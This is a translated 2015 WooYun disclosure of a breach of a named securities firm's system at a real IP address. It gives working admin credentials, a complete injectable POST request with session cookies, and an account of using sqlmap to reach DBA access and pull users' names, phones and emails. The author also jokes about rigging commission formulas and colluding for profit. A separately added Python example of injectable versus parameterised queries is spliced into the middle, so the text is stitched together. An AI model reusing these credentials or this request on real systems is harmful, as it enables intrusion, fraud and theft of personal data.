
Vulnerability summary

Defect ID: wooyun-2015-0163274

Title: Weak password on a Dongguan Securities site leads to SQL injection and leakage of user information (names, phone numbers, email addresses, etc.)

Vendor: Dongguan Securities Co., Ltd. (东莞证券股份有限公司)

Author: 路人甲

Submitted: 2015-12-21 21:58

Fix deadline: 2015-12-26 22:00

Published: 2015-12-26 22:00

Vulnerability type: application misconfiguration

Severity: high

Self-assessed Rank: 15

Status: vendor notified, vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-21: details sent to the vendor, awaiting vendor handling
2015-12-26: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

As the title says.

Detailed description:

http://113.78.134.110:81/login.do weak credentials admin:000000

[screenshot: 11.png]

Found some interesting functions, for example commission (提成) can be controlled from here.

[screenshot: 11.png]

If I simply edited the commission formula and then colluded with one or two people, well... (very lucrative).

Proof of vulnerability:

POST /plug-in/FormulaEdit/xcfa/XCFA_operater.jsp?MODE=getRYJB HTTP/1.1
Host: 113.78.134.110:81
Content-Length: 7
Accept: */*
Origin: http://113.78.134.110:81
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://113.78.134.110:81/plug-in/common/transfer.jsp?ObjName=JspXCFA_ALL&Title=%E8%96%AA%E9%85%AC%E6%96%B9%E6%A1%88%E6%9F%A5%E7%9C%8B&Target=%2FUIProcessor%3FTable%3DJspXCFA_ALL%26ObjDescribe%3DekQgsYuZOYlCJlO7vghYvv41*q*BGee3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: JSESSIONID=CD1D8642528FC7F86453EDE89D86BA6D.server1; UserID=admin; PortalToken=CD1D8642528FC7F86453EDE89D86BA6D.server1; ys-TreeState_5c1e7d68efba511c6e0ea9b8cafa4fb3.gt=o%3ARoot%3Ds%253AE%5EType.0%3Ds%253AE%5EType.1%3Ds%253AE; ys-TreeState_93782624d81163345d84577e158e26bd.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_799cde630a734708b3880f841ffa3f7d=o%3A1%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_e0b9adc1f800d29087017abd5def90cb.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_ed9b71d747488ab403c5cbf458822293.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_190cd205bb5a88c520b1fb91a3415f3a.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_7ef60d9127bb21b3203ca468ff919460.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_aa1c2e4bf18892844e938f68b2de3da1.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_293313064b95482991c003a03ac389b8.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE
RYFL=24

Threw it straight into sqlmap; it turned out the database connection also has DBA privileges.
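To show why the RYFL parameter in the request above can be abused, here is an added illustration that is not code from the page or from the vendor's application: a constructed SQLite stand-in in Python (the real endpoint is JSP, and the table and column names are assumptions) contrasting a string-concatenated query with a validated, bound parameter.

```python
import sqlite3


def seed_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the getRYJB lookup.

    The table/column names (ryjb, ryfl, grade, rate) are assumptions,
    not the vendor's real schema.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ryjb (ryfl INTEGER, grade TEXT, rate REAL)")
    conn.executemany(
        "INSERT INTO ryjb VALUES (?, ?, ?)",
        [(24, "A", 0.12), (25, "B", 0.10), (26, "C", 0.08)],
    )
    return conn


def get_ryjb_vulnerable(conn: sqlite3.Connection, ryfl: str) -> list:
    # The raw request parameter is spliced into the SQL text, so any
    # SQL syntax the client sends becomes part of the statement.
    sql = "SELECT grade, rate FROM ryjb WHERE ryfl = " + ryfl
    return conn.execute(sql).fetchall()


def get_ryjb_fixed(conn: sqlite3.Connection, ryfl: str) -> list:
    # Validate the type the endpoint expects, then bind the value so the
    # database driver never interprets it as SQL.
    if not ryfl.isdigit():
        raise ValueError("RYFL must be a non-negative integer")
    return conn.execute(
        "SELECT grade, rate FROM ryjb WHERE ryfl = ?", (int(ryfl),)
    ).fetchall()


def demo() -> dict:
    """Run both variants on the legitimate value and on a tampered one."""
    conn = seed_db()
    tampered = "24 OR 1=1"  # a value the parameter was never meant to accept
    vuln_rows = get_ryjb_vulnerable(conn, tampered)  # tautology returns every row
    try:
        get_ryjb_fixed(conn, tampered)
        fixed_rejects = False
    except ValueError:
        fixed_rejects = True
    return {
        "normal": get_ryjb_fixed(conn, "24"),
        "vuln_row_count": len(vuln_rows),
        "fixed_rejects_tampered": fixed_rejects,
    }
```

Running demo() shows the concatenated version returning all three rows for the tampered input while the bound version refuses it and still answers the legitimate request.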

[screenshot: 11.png]

Checked the number of users; not many, just over 10,000.

[screenshot: 11.png]

But the records include users' basic information such as names, phone numbers and email addresses; extracted a recent portion:


Surprisingly, found a large number of weak passwords...

Fix recommendation:

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2015-12-26 22:00

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet